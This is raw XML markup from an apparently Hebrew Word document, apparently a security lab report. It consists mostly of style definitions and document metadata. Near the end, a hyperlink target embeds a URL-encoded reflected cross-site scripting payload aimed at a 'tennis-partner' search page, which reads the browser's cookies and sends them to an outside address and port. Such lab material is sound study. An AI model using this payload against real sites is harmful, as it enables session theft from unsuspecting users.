    <w:link w:val="50"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D32CA5"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:bCs/>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7178"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:iCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="40"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="כותרת 2 תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00827178"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="32"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="כותרת 3 תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BB6144"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:iCs/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0011593B"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="כותרת 4 תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00ED34C1"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="כותרת 5 תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D32CA5"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:iCs/>
      <w:szCs w:val="20"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00BB6144"/>
    <w:pPr>
      <w:bidi/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001703C3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a6">
    <w:name w:val="כותרת עליונה תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="001703C3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001703C3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a8">
    <w:name w:val="כותרת תחתונה תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="001703C3"/>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00506AB0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008C6127"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A807F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807F7"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00517753"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00517753"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00421A01"/>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5014">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="898904509">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1335306128">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1647081898">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="18032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92.168.179.1/tennis-partner/search.php?q=%3Cscript%3Elet%20cookie=document.cookie;%20fetch(%60http://192.168.179.1:1234/?cookie=$%7bcookie%7d%60);%3C/script%3E&amp;column=name&amp;submit=Find"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903F-994B-488B-8D3B-0DE2FC36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538</Words>
  <Characters>17692</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ברעם</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>טל ברעם</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-07-20T13:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-20T13:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>